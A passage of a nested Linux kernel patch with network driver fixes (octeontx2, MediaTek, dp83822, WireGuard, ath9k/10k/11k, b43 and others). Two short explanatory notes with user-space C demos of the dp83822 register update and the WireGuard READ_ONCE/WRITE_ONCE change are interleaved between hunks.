++		mbox_data &= ~MBOX_DOWN_MSG;
++		otx2_write64(vf, RVU_VF_VFPF_MBOX0, mbox_data);
+ 
+-	trace_otx2_msg_interrupt(mbox->pdev, "PF to VF", BIT_ULL(0));
++		/* Check for PF => VF response messages */
++		mbox = &vf->mbox.mbox;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
+ 
+-	hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (hdr->num_msgs) {
+-		vf->mbox.num_msgs = hdr->num_msgs;
+-		hdr->num_msgs = 0;
+-		memset(mbox->hwbase + mbox->rx_start, 0,
+-		       ALIGN(sizeof(struct mbox_hdr), sizeof(u64)));
+-		queue_work(vf->mbox_wq, &vf->mbox.mbox_wrk);
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(vf->mbox_wq, &vf->mbox.mbox_wrk);
++
++		trace_otx2_msg_interrupt(mbox->pdev, "DOWN reply from PF to VF",
++					 BIT_ULL(0));
+ 	}
+-	/* Check for PF => VF notification messages */
+-	mbox = &vf->mbox.mbox_up;
+-	mdev = &mbox->dev[0];
+-	otx2_sync_mbox_bbuf(mbox, 0);
+ 
+-	hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (hdr->num_msgs) {
+-		vf->mbox.up_num_msgs = hdr->num_msgs;
+-		hdr->num_msgs = 0;
+-		memset(mbox->hwbase + mbox->rx_start, 0,
+-		       ALIGN(sizeof(struct mbox_hdr), sizeof(u64)));
+-		queue_work(vf->mbox_wq, &vf->mbox.mbox_up_wrk);
++	if (mbox_data & MBOX_UP_MSG) {
++		mbox_data &= ~MBOX_UP_MSG;
++		otx2_write64(vf, RVU_VF_VFPF_MBOX0, mbox_data);
++
++		/* Check for PF => VF notification messages */
++		mbox = &vf->mbox.mbox_up;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
++
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(vf->mbox_wq, &vf->mbox.mbox_up_wrk);
++
++		trace_otx2_msg_interrupt(mbox->pdev, "UP message from PF to VF",
++					 BIT_ULL(0));
+ 	}
+ 
+ 	return IRQ_HANDLED;
+@@ -293,9 +308,8 @@ static int otx2vf_vfaf_mbox_init(struct otx2_nic *vf)
+ 	int err;
+ 
+ 	mbox->pfvf = vf;
+-	vf->mbox_wq = alloc_workqueue("otx2_vfaf_mailbox",
+-				      WQ_UNBOUND | WQ_HIGHPRI |
+-				      WQ_MEM_RECLAIM, 1);
++	vf->mbox_wq = alloc_ordered_workqueue("otx2_vfaf_mailbox",
++					      WQ_HIGHPRI | WQ_MEM_RECLAIM);
+ 	if (!vf->mbox_wq)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 17e6ac4445afc..fecf3dd22dfaa 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -561,8 +561,7 @@ static int mtk_mac_finish(struct phylink_config *config, unsigned int mode,
+ 	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 	mcr_new = mcr_cur;
+ 	mcr_new |= MAC_MCR_IPG_CFG | MAC_MCR_FORCE_MODE |
+-		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK |
+-		   MAC_MCR_RX_FIFO_CLR_DIS;
++		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_RX_FIFO_CLR_DIS;
+ 
+ 	/* Only update control register when needed! */
+ 	if (mcr_new != mcr_cur)
+@@ -610,7 +609,7 @@ static void mtk_mac_link_down(struct phylink_config *config, unsigned int mode,
+ 					   phylink_config);
+ 	u32 mcr = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 
+-	mcr &= ~(MAC_MCR_TX_EN | MAC_MCR_RX_EN);
++	mcr &= ~(MAC_MCR_TX_EN | MAC_MCR_RX_EN | MAC_MCR_FORCE_LINK);
+ 	mtk_w32(mac->hw, mcr, MTK_MAC_MCR(mac->id));
+ }
+ 
+@@ -649,7 +648,7 @@ static void mtk_mac_link_up(struct phylink_config *config,
+ 	if (rx_pause)
+ 		mcr |= MAC_MCR_FORCE_RX_FC;
+ 
+-	mcr |= MAC_MCR_TX_EN | MAC_MCR_RX_EN;
++	mcr |= MAC_MCR_TX_EN | MAC_MCR_RX_EN | MAC_MCR_FORCE_LINK;
+ 	mtk_w32(mac->hw, mcr, MTK_MAC_MCR(mac->id));
+ }
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index d6eed204574a9..c64211e22ae70 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -811,7 +811,7 @@ void mtk_ppe_start(struct mtk_ppe *ppe)
+ 			 MTK_PPE_KEEPALIVE_DISABLE) |
+ 	      FIELD_PREP(MTK_PPE_TB_CFG_HASH_MODE, 1) |
+ 	      FIELD_PREP(MTK_PPE_TB_CFG_SCAN_MODE,
+-			 MTK_PPE_SCAN_MODE_KEEPALIVE_AGE) |
++			 MTK_PPE_SCAN_MODE_CHECK_AGE) |
+ 	      FIELD_PREP(MTK_PPE_TB_CFG_ENTRY_NUM,
+ 			 MTK_PPE_ENTRIES_SHIFT);
+ 	if (MTK_HAS_CAPS(ppe->eth->soc->caps, MTK_NETSYS_V2))
+@@ -895,17 +895,21 @@ int mtk_ppe_stop(struct mtk_ppe *ppe)
+ 
+ 	mtk_ppe_cache_enable(ppe, false);
+ 
+-	/* disable offload engine */
+-	ppe_clear(ppe, MTK_PPE_GLO_CFG, MTK_PPE_GLO_CFG_EN);
+-	ppe_w32(ppe, MTK_PPE_FLOW_CFG, 0);
+-
+ 	/* disable aging */
+ 	val = MTK_PPE_TB_CFG_AGE_NON_L4 |
+ 	      MTK_PPE_TB_CFG_AGE_UNBIND |
+ 	      MTK_PPE_TB_CFG_AGE_TCP |
+ 	      MTK_PPE_TB_CFG_AGE_UDP |
+-	      MTK_PPE_TB_CFG_AGE_TCP_FIN;
++	      MTK_PPE_TB_CFG_AGE_TCP_FIN |
++	      MTK_PPE_TB_CFG_SCAN_MODE;
+ 	ppe_clear(ppe, MTK_PPE_TB_CFG, val);
+ 
+-	return mtk_ppe_wait_busy(ppe);
++	if (mtk_ppe_wait_busy(ppe))
++		return -ETIMEDOUT;
++
++	/* disable offload engine */
++	ppe_clear(ppe, MTK_PPE_GLO_CFG, MTK_PPE_GLO_CFG_EN);
++	ppe_w32(ppe, MTK_PPE_FLOW_CFG, 0);
++
++	return 0;
+ }
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c b/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c
+index e92860e20a24a..c6a2c302a8c8b 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c
+@@ -308,6 +308,11 @@ static void nfp_fl_lag_do_work(struct work_struct *work)
+ 
+ 		acti_netdevs = kmalloc_array(entry->slave_cnt,
+ 					     sizeof(*acti_netdevs), GFP_KERNEL);
++		if (!acti_netdevs) {
++			schedule_delayed_work(&lag->work,
++					      NFP_FL_LAG_DELAY);
++			continue;
++		}
+ 
+ 		/* Include sanity check in the loop. It may be that a bond has
+ 		 * changed between processing the last notification and the
+diff --git a/drivers/net/phy/dp83822.c b/drivers/net/phy/dp83822.c
+index 267e6fd3d4448..57411ee1d8374 100644
+--- a/drivers/net/phy/dp83822.c
++++ b/drivers/net/phy/dp83822.c
+@@ -380,7 +380,7 @@ static int dp83822_config_init(struct phy_device *phydev)
+ {
+ 	struct dp83822_private *dp83822 = phydev->priv;
+ 	struct device *dev = &phydev->mdio.dev;
+-	int rgmii_delay;
++	int rgmii_delay = 0;
+ 	s32 rx_int_delay;
+ 	s32 tx_int_delay;
+ 	int err = 0;
+@@ -390,30 +390,33 @@ static int dp83822_config_init(struct phy_device *phydev)
+ 		rx_int_delay = phy_get_internal_delay(phydev, dev, NULL, 0,
+ 						      true);
+ 
+-		if (rx_int_delay <= 0)
+-			rgmii_delay = 0;
+-		else
+-			rgmii_delay = DP83822_RX_CLK_SHIFT;
++		/* Set DP83822_RX_CLK_SHIFT to enable rx clk internal delay */
++		if (rx_int_delay > 0)
++			rgmii_delay |= DP83822_RX_CLK_SHIFT;
+ 
+ 		tx_int_delay = phy_get_internal_delay(phydev, dev, NULL, 0,
+ 						      false);
++
++		/* Set DP83822_TX_CLK_SHIFT to disable tx clk internal delay */
+ 		if (tx_int_delay <= 0)
+-			rgmii_delay &= ~DP83822_TX_CLK_SHIFT;
+-		else
+ 			rgmii_delay |= DP83822_TX_CLK_SHIFT;
+ 
+-		if (rgmii_delay) {
+-			err = phy_set_bits_mmd(phydev, DP83822_DEVADDR,
+-					       MII_DP83822_RCSR, rgmii_delay);
+-			if (err)
+-				return err;
+-		}
++		err = phy_modify_mmd(phydev, DP83822_DEVADDR, MII_DP83822_RCSR,
++				     DP83822_RX_CLK_SHIFT | DP83822_TX_CLK_SHIFT, rgmii_delay);
++		if (err)
++			return err;
++
++		err = phy_set_bits_mmd(phydev, DP83822_DEVADDR,
++				       MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
+ 
+-		phy_set_bits_mmd(phydev, DP83822_DEVADDR,
+-					MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
++		if (err)
++			return err;
+ 	} else {
+-		phy_clear_bits_mmd(phydev, DP83822_DEVADDR,
+-					MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
++		err = phy_clear_bits_mmd(phydev, DP83822_DEVADDR,
++					 MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
++
++		if (err)
++			return err;
+ 	}
+ 
+ 	if (dp83822->fx_enabled) {
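The dp83822 hunk above replaces conditional set-bits calls with a single
phy_modify_mmd() over both clock-shift bits, so RCSR always ends up in a
known state. Note the inverted senses spelled out in the new comments: the
RX bit enables the rx delay while the TX bit disables the tx delay. A
user-space model of the read-modify-write, with the bit positions assumed
for the demo:

#include <stdint.h>
#include <stdio.h>

#define DP83822_TX_CLK_SHIFT (1u << 11)	/* positions assumed */
#define DP83822_RX_CLK_SHIFT (1u << 12)

static uint16_t rcsr = 0xffff;		/* pretend register contents */

static void phy_modify(uint16_t mask, uint16_t set)
{
	rcsr = (rcsr & ~mask) | set;	/* what phy_modify_mmd() boils down to */
}

int main(void)
{
	int rx_delay = 2000, tx_delay = 0;	/* ps, from firmware/DT */
	uint16_t val = 0;

	if (rx_delay > 0)
		val |= DP83822_RX_CLK_SHIFT;	/* enable rx internal delay */
	if (tx_delay <= 0)
		val |= DP83822_TX_CLK_SHIFT;	/* disable tx internal delay */

	phy_modify(DP83822_RX_CLK_SHIFT | DP83822_TX_CLK_SHIFT, val);
	printf("RCSR = 0x%04x\n", rcsr);
	return 0;
}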
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 944f76e6fc8eb..f25b0d338ca8d 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -2640,8 +2640,8 @@ EXPORT_SYMBOL(genphy_resume);
+ int genphy_loopback(struct phy_device *phydev, bool enable)
+ {
+ 	if (enable) {
+-		u16 val, ctl = BMCR_LOOPBACK;
+-		int ret;
++		u16 ctl = BMCR_LOOPBACK;
++		int ret, val;
+ 
+ 		ctl |= mii_bmcr_encode_fixed(phydev->speed, phydev->duplex);
+ 
+@@ -2893,7 +2893,7 @@ s32 phy_get_internal_delay(struct phy_device *phydev, struct device *dev,
+ 	if (delay < 0)
+ 		return delay;
+ 
+-	if (delay && size == 0)
++	if (size == 0)
+ 		return delay;
+ 
+ 	if (delay < delay_values[0] || delay > delay_values[size - 1]) {
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index a530f20ee2575..2fa46baa589e5 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -2104,6 +2104,11 @@ static const struct usb_device_id products[] = {
+ 		USB_DEVICE(0x0424, 0x9E08),
+ 		.driver_info = (unsigned long) &smsc95xx_info,
+ 	},
++	{
++		/* SYSTEC USB-SPEmodule1 10BASE-T1L Ethernet Device */
++		USB_DEVICE(0x0878, 0x1400),
++		.driver_info = (unsigned long)&smsc95xx_info,
++	},
+ 	{
+ 		/* Microchip's EVB-LAN8670-USB 10BASE-T1S Ethernet Device */
+ 		USB_DEVICE(0x184F, 0x0051),
+diff --git a/drivers/net/usb/sr9800.c b/drivers/net/usb/sr9800.c
+index f5e19f3ef6cdd..4de5144821835 100644
+--- a/drivers/net/usb/sr9800.c
++++ b/drivers/net/usb/sr9800.c
+@@ -737,7 +737,9 @@ static int sr9800_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	data->eeprom_len = SR9800_EEPROM_LEN;
+ 
+-	usbnet_get_endpoints(dev, intf);
++	ret = usbnet_get_endpoints(dev, intf);
++	if (ret)
++		goto out;
+ 
+ 	/* LED Setting Rule :
+ 	 * AABB:CCDD
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index dd9f5f1461921..8dcd3b6e143b9 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -1444,8 +1444,6 @@ static netdev_features_t veth_fix_features(struct net_device *dev,
+ 		if (peer_priv->_xdp_prog)
+ 			features &= ~NETIF_F_GSO_SOFTWARE;
+ 	}
+-	if (priv->_xdp_prog)
+-		features |= NETIF_F_GRO;
+ 
+ 	return features;
+ }
+@@ -1542,14 +1540,6 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 		}
+ 
+ 		if (!old_prog) {
+-			if (!veth_gro_requested(dev)) {
+-				/* user-space did not require GRO, but adding
+-				 * XDP is supposed to get GRO working
+-				 */
+-				dev->features |= NETIF_F_GRO;
+-				netdev_features_change(dev);
+-			}
+-
+ 			peer->hw_features &= ~NETIF_F_GSO_SOFTWARE;
+ 			peer->max_mtu = max_mtu;
+ 		}
+@@ -1560,14 +1550,6 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 			if (dev->flags & IFF_UP)
+ 				veth_disable_xdp(dev);
+ 
+-			/* if user-space did not require GRO, since adding XDP
+-			 * enabled it, clear it now
+-			 */
+-			if (!veth_gro_requested(dev)) {
+-				dev->features &= ~NETIF_F_GRO;
+-				netdev_features_change(dev);
+-			}
+-
+ 			if (peer) {
+ 				peer->hw_features |= NETIF_F_GSO_SOFTWARE;
+ 				peer->max_mtu = ETH_MAX_MTU;
+diff --git a/drivers/net/wireguard/receive.c b/drivers/net/wireguard/receive.c
+index a176653c88616..db01ec03bda00 100644
+--- a/drivers/net/wireguard/receive.c
++++ b/drivers/net/wireguard/receive.c
+@@ -251,7 +251,7 @@ static bool decrypt_packet(struct sk_buff *skb, struct noise_keypair *keypair)
+ 
+ 	if (unlikely(!READ_ONCE(keypair->receiving.is_valid) ||
+ 		  wg_birthdate_has_expired(keypair->receiving.birthdate, REJECT_AFTER_TIME) ||
+-		  keypair->receiving_counter.counter >= REJECT_AFTER_MESSAGES)) {
++		  READ_ONCE(keypair->receiving_counter.counter) >= REJECT_AFTER_MESSAGES)) {
+ 		WRITE_ONCE(keypair->receiving.is_valid, false);
+ 		return false;
+ 	}
+@@ -318,7 +318,7 @@ static bool counter_validate(struct noise_replay_counter *counter, u64 their_cou
+ 		for (i = 1; i <= top; ++i)
+ 			counter->backtrack[(i + index_current) &
+ 				((COUNTER_BITS_TOTAL / BITS_PER_LONG) - 1)] = 0;
+-		counter->counter = their_counter;
++		WRITE_ONCE(counter->counter, their_counter);
+ 	}
+ 
+ 	index &= (COUNTER_BITS_TOTAL / BITS_PER_LONG) - 1;
+@@ -463,7 +463,7 @@ int wg_packet_rx_poll(struct napi_struct *napi, int budget)
+ 			net_dbg_ratelimited("%s: Packet has invalid nonce %llu (max %llu)\n",
+ 					    peer->device->dev->name,
+ 					    PACKET_CB(skb)->nonce,
+-					    keypair->receiving_counter.counter);
++					    READ_ONCE(keypair->receiving_counter.counter));
+ 			goto next;
+ 		}
+ 
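The WireGuard hunk above annotates a 64-bit counter that is written under
the replay-window lock but checked locklessly on the receive path; marking
both sides with WRITE_ONCE()/READ_ONCE() stops the compiler from tearing
or re-loading the value and documents the intentional data race. A minimal
user-space sketch of the pattern, with the kernel macros re-derived via
volatile for the demo:

#include <stdint.h>
#include <stdio.h>

#define WRITE_ONCE(x, v) (*(volatile typeof(x) *)&(x) = (v))
#define READ_ONCE(x)     (*(volatile typeof(x) *)&(x))

#define REJECT_AFTER_MESSAGES (1ULL << 60)	/* stand-in limit */

static uint64_t receiving_counter;

int main(void)
{
	WRITE_ONCE(receiving_counter, 123);	/* updater, under the lock */

	/* lockless checker, as in decrypt_packet() above */
	if (READ_ONCE(receiving_counter) >= REJECT_AFTER_MESSAGES)
		puts("reject: counter exhausted");
	else
		printf("counter = %llu\n",
		       (unsigned long long)READ_ONCE(receiving_counter));
	return 0;
}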
+diff --git a/drivers/net/wireless/ath/ath10k/wmi-tlv.c b/drivers/net/wireless/ath/ath10k/wmi-tlv.c
+index 876410a47d1d2..4d5009604eee7 100644
+--- a/drivers/net/wireless/ath/ath10k/wmi-tlv.c
++++ b/drivers/net/wireless/ath/ath10k/wmi-tlv.c
+@@ -844,6 +844,10 @@ ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev(struct ath10k *ar, struct sk_buff *skb,
+ 	}
+ 
+ 	ev = tb[WMI_TLV_TAG_STRUCT_MGMT_TX_COMPL_EVENT];
++	if (!ev) {
++		kfree(tb);
++		return -EPROTO;
++	}
+ 
+ 	arg->desc_id = ev->desc_id;
+ 	arg->status = ev->status;
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index 21c6b36dc6ebb..51fc77e93de5c 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -2112,6 +2112,8 @@ static void ath11k_peer_assoc_h_he(struct ath11k *ar,
+ 	mcs_160_map = le16_to_cpu(he_cap->he_mcs_nss_supp.rx_mcs_160);
+ 	mcs_80_map = le16_to_cpu(he_cap->he_mcs_nss_supp.rx_mcs_80);
+ 
++	/* Initialize rx_mcs_160 to 9 which is an invalid value */
++	rx_mcs_160 = 9;
+ 	if (support_160) {
+ 		for (i = 7; i >= 0; i--) {
+ 			u8 mcs_160 = (mcs_160_map >> (2 * i)) & 3;
+@@ -2123,6 +2125,8 @@ static void ath11k_peer_assoc_h_he(struct ath11k *ar,
+ 		}
+ 	}
+ 
++	/* Initialize rx_mcs_80 to 9 which is an invalid value */
++	rx_mcs_80 = 9;
+ 	for (i = 7; i >= 0; i--) {
+ 		u8 mcs_80 = (mcs_80_map >> (2 * i)) & 3;
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc.h b/drivers/net/wireless/ath/ath9k/htc.h
+index 237f4ec2cffd7..6c33e898b3000 100644
+--- a/drivers/net/wireless/ath/ath9k/htc.h
++++ b/drivers/net/wireless/ath/ath9k/htc.h
+@@ -306,7 +306,6 @@ struct ath9k_htc_tx {
+ 	DECLARE_BITMAP(tx_slot, MAX_TX_BUF_NUM);
+ 	struct timer_list cleanup_timer;
+ 	spinlock_t tx_lock;
+-	bool initialized;
+ };
+ 
+ struct ath9k_htc_tx_ctl {
+@@ -515,6 +514,7 @@ struct ath9k_htc_priv {
+ 	unsigned long ps_usecount;
+ 	bool ps_enabled;
+ 	bool ps_idle;
++	bool initialized;
+ 
+ #ifdef CONFIG_MAC80211_LEDS
+ 	enum led_brightness brightness;
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_init.c b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+index 96a3185a96d75..b014185373f34 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_init.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+@@ -966,6 +966,10 @@ int ath9k_htc_probe_device(struct htc_target *htc_handle, struct device *dev,
+ 
+ 	htc_handle->drv_priv = priv;
+ 
++	/* Allow ath9k_wmi_event_tasklet() to operate. */
++	smp_wmb();
++	priv->initialized = true;
++
+ 	return 0;
+ 
+ err_init:
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+index d6a3f001dacb9..2fdd27885f543 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+@@ -815,10 +815,6 @@ int ath9k_tx_init(struct ath9k_htc_priv *priv)
+ 	skb_queue_head_init(&priv->tx.data_vo_queue);
+ 	skb_queue_head_init(&priv->tx.tx_failed);
+ 
+-	/* Allow ath9k_wmi_event_tasklet(WMI_TXSTATUS_EVENTID) to operate. */
+-	smp_wmb();
+-	priv->tx.initialized = true;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index 1476b42b52a91..805ad31edba2b 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -155,6 +155,12 @@ void ath9k_wmi_event_tasklet(struct tasklet_struct *t)
+ 		}
+ 		spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
++		/* Check if ath9k_htc_probe_device() completed. */
++		if (!data_race(priv->initialized)) {
++			kfree_skb(skb);
++			continue;
++		}
++
+ 		hdr = (struct wmi_cmd_hdr *) skb->data;
+ 		cmd_id = be16_to_cpu(hdr->command_id);
+ 		wmi_event = skb_pull(skb, sizeof(struct wmi_cmd_hdr));
+@@ -169,10 +175,6 @@ void ath9k_wmi_event_tasklet(struct tasklet_struct *t)
+ 					     &wmi->drv_priv->fatal_work);
+ 			break;
+ 		case WMI_TXSTATUS_EVENTID:
+-			/* Check if ath9k_tx_init() completed. */
+-			if (!data_race(priv->tx.initialized))
+-				break;
+-
+ 			spin_lock_bh(&priv->tx.tx_lock);
+ 			if (priv->tx.flags & ATH9K_HTC_OP_TX_DRAIN) {
+ 				spin_unlock_bh(&priv->tx.tx_lock);
+diff --git a/drivers/net/wireless/broadcom/b43/b43.h b/drivers/net/wireless/broadcom/b43/b43.h
+index 67b4bac048e58..c0d8fc0b22fb2 100644
+--- a/drivers/net/wireless/broadcom/b43/b43.h
++++ b/drivers/net/wireless/broadcom/b43/b43.h
+@@ -1082,6 +1082,22 @@ static inline bool b43_using_pio_transfers(struct b43_wldev *dev)
+ 	return dev->__using_pio_transfers;
+ }
+ 
++static inline void b43_wake_queue(struct b43_wldev *dev, int queue_prio)
++{
++	if (dev->qos_enabled)
++		ieee80211_wake_queue(dev->wl->hw, queue_prio);
++	else
++		ieee80211_wake_queue(dev->wl->hw, 0);
++}
++
++static inline void b43_stop_queue(struct b43_wldev *dev, int queue_prio)
++{
++	if (dev->qos_enabled)
++		ieee80211_stop_queue(dev->wl->hw, queue_prio);
++	else
++		ieee80211_stop_queue(dev->wl->hw, 0);
++}
++
+ /* Message printing */
+ __printf(2, 3) void b43info(struct b43_wl *wl, const char *fmt, ...);
+ __printf(2, 3) void b43err(struct b43_wl *wl, const char *fmt, ...);
+diff --git a/drivers/net/wireless/broadcom/b43/dma.c b/drivers/net/wireless/broadcom/b43/dma.c
+index 9a7c62bd5e431..cfaf2f9d67b22 100644
+--- a/drivers/net/wireless/broadcom/b43/dma.c
++++ b/drivers/net/wireless/broadcom/b43/dma.c
+@@ -1399,7 +1399,7 @@ int b43_dma_tx(struct b43_wldev *dev, struct sk_buff *skb)
+ 	    should_inject_overflow(ring)) {
+ 		/* This TX ring is full. */
+ 		unsigned int skb_mapping = skb_get_queue_mapping(skb);
+-		ieee80211_stop_queue(dev->wl->hw, skb_mapping);
++		b43_stop_queue(dev, skb_mapping);
+ 		dev->wl->tx_queue_stopped[skb_mapping] = true;
+ 		ring->stopped = true;
+ 		if (b43_debug(dev, B43_DBG_DMAVERBOSE)) {
+@@ -1570,7 +1570,7 @@ void b43_dma_handle_txstatus(struct b43_wldev *dev,
+ 	} else {
+ 		/* If the driver queue is running wake the corresponding
+ 		 * mac80211 queue. */
+-		ieee80211_wake_queue(dev->wl->hw, ring->queue_prio);
++		b43_wake_queue(dev, ring->queue_prio);
+ 		if (b43_debug(dev, B43_DBG_DMAVERBOSE)) {
+ 			b43dbg(dev->wl, "Woke up TX ring %d\n", ring->index);
+ 		}
+diff --git a/drivers/net/wireless/broadcom/b43/main.c b/drivers/net/wireless/broadcom/b43/main.c
+index b2539a916fd04..bdfa68cc7ee2a 100644
+--- a/drivers/net/wireless/broadcom/b43/main.c
++++ b/drivers/net/wireless/broadcom/b43/main.c
+@@ -2587,7 +2587,8 @@ static void b43_request_firmware(struct work_struct *work)
+ 
+ start_ieee80211:
+ 	wl->hw->queues = B43_QOS_QUEUE_NUM;
+-	if (!modparam_qos || dev->fw.opensource)
++	if (!modparam_qos || dev->fw.opensource ||
++	    dev->dev->chip_id == BCMA_CHIP_ID_BCM4331)
+ 		wl->hw->queues = 1;
+ 
+ 	err = ieee80211_register_hw(wl->hw);
+@@ -3603,7 +3604,7 @@ static void b43_tx_work(struct work_struct *work)
+ 				err = b43_dma_tx(dev, skb);
+ 			if (err == -ENOSPC) {
+ 				wl->tx_queue_stopped[queue_num] = true;
+-				ieee80211_stop_queue(wl->hw, queue_num);
++				b43_stop_queue(dev, queue_num);
+ 				skb_queue_head(&wl->tx_queue[queue_num], skb);
+ 				break;
+ 			}
+@@ -3627,6 +3628,7 @@ static void b43_op_tx(struct ieee80211_hw *hw,
+ 		      struct sk_buff *skb)
+ {
+ 	struct b43_wl *wl = hw_to_b43_wl(hw);
++	u16 skb_queue_mapping;
+ 
+ 	if (unlikely(skb->len < 2 + 2 + 6)) {
+ 		/* Too short, this can't be a valid frame. */
+@@ -3635,12 +3637,12 @@ static void b43_op_tx(struct ieee80211_hw *hw,
+ 	}
+ 	B43_WARN_ON(skb_shinfo(skb)->nr_frags);
+ 
+-	skb_queue_tail(&wl->tx_queue[skb->queue_mapping], skb);
+-	if (!wl->tx_queue_stopped[skb->queue_mapping]) {
++	skb_queue_mapping = skb_get_queue_mapping(skb);
++	skb_queue_tail(&wl->tx_queue[skb_queue_mapping], skb);
++	if (!wl->tx_queue_stopped[skb_queue_mapping])
+ 		ieee80211_queue_work(wl->hw, &wl->tx_work);
+-	} else {
+-		ieee80211_stop_queue(wl->hw, skb->queue_mapping);
+-	}
++	else
++		b43_stop_queue(wl->current_dev, skb_queue_mapping);
+ }
+ 
+ static void b43_qos_params_upload(struct b43_wldev *dev,
+diff --git a/drivers/net/wireless/broadcom/b43/pio.c b/drivers/net/wireless/broadcom/b43/pio.c
+index 8c28a9250cd19..cc19b589fa70d 100644
+--- a/drivers/net/wireless/broadcom/b43/pio.c
++++ b/drivers/net/wireless/broadcom/b43/pio.c
+@@ -525,7 +525,7 @@ int b43_pio_tx(struct b43_wldev *dev, struct sk_buff *skb)
+ 	if (total_len > (q->buffer_size - q->buffer_used)) {
+ 		/* Not enough memory on the queue. */
+ 		err = -EBUSY;
+-		ieee80211_stop_queue(dev->wl->hw, skb_get_queue_mapping(skb));
++		b43_stop_queue(dev, skb_get_queue_mapping(skb));
+ 		q->stopped = true;
+ 		goto out;
+ 	}
+@@ -552,7 +552,7 @@ int b43_pio_tx(struct b43_wldev *dev, struct sk_buff *skb)
+ 	if (((q->buffer_size - q->buffer_used) < roundup(2 + 2 + 6, 4)) ||
+ 	    (q->free_packet_slots == 0)) {
+ 		/* The queue is full. */
+-		ieee80211_stop_queue(dev->wl->hw, skb_get_queue_mapping(skb));
++		b43_stop_queue(dev, skb_get_queue_mapping(skb));
+ 		q->stopped = true;
+ 	}
+ 
+@@ -587,7 +587,7 @@ void b43_pio_handle_txstatus(struct b43_wldev *dev,
+ 	list_add(&pack->list, &q->packets_list);
+ 
+ 	if (q->stopped) {
+-		ieee80211_wake_queue(dev->wl->hw, q->queue_prio);
++		b43_wake_queue(dev, q->queue_prio);
+ 		q->stopped = false;
+ 	}
+ }
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c
+index ccc621b8ed9f2..4a1fe982a948e 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c
+@@ -383,8 +383,9 @@ struct shared_phy *wlc_phy_shared_attach(struct shared_phy_params *shp)
+ 	return sh;
+ }
+ 
+-static void wlc_phy_timercb_phycal(struct brcms_phy *pi)
++static void wlc_phy_timercb_phycal(void *ptr)
+ {
++	struct brcms_phy *pi = ptr;
+ 	uint delay = 5;
+ 
+ 	if (PHY_PERICAL_MPHASE_PENDING(pi)) {
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c
+index a0de5db0cd646..b723817915365 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c
